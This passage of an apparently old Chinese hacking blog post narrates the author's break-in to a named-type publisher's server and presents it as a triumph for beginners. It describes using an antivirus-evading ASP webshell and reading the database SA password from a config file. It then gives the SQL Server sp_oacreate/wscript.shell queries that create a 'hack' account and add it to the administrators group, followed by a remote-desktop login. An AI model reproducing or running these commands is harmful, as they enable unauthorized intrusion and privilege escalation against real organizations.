入侵国内某知名出版社全记录
三.拿下目标
我用的也是海洋2006不过是加密免杀的,现在就是提权了,用海洋的“服务器相关数据”看了看开的服务,发现并没有安装serv-U,很多菜鸟看到这里可能就会放弃了!其实没有serv-u也没关系,毕竟条条大陆通罗马么!还记得刚刚注入时是SA的权限么?这就说明数据库连接用的是SA,到网站主页下随便打开一个ASP文件看看,图16
“common/inc_const.asp”这个就是ASP被打开后先调用的数据库连接文件了,我们马上到该目录下的common找到inc_const.asp对它编辑,图17
怎么样?是不是有大发现了,其实提权就是这么简单!SA密码暴露无疑啊!
现在该怎么办呢?拿出SQL连接器输入密码连接上去,哈哈成功了,选择“利用目录”==》“执行DOS命令”加个用户试试,图18
OK,我们在“查询”中输入:
------------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
-----------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
--------------------------------------------------
这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20
怎么样?是不是条条大路通罗马?
用增加的用户登陆3389看看(图21)
哈哈,成功!任务完成!^_^
四.小结
由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的入侵过程了,文章读起来很简单(我在实际中可是遇到很多问题),但要是你实际操作起来可能就会遇到很多问题了,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。这里不仅给大家展示的是一次入侵过程更想把入侵中分析问题的思想传达给各位菜鸟朋友们,由于我水平有限可能文章有很多不足之处,所以还请各位见笑了
- 2006-04-18
- 2005-12-22
- 2005-11-23
- 2005-10-31
- 2005-10-31
- 2005-10-14
- 2005-10-14
- 2005-09-29
- 08-31
- 08-28
- 08-28
- 08-24
- 08-24
- 08-22
- 08-21
- 08-20
- 08-20
- 08-17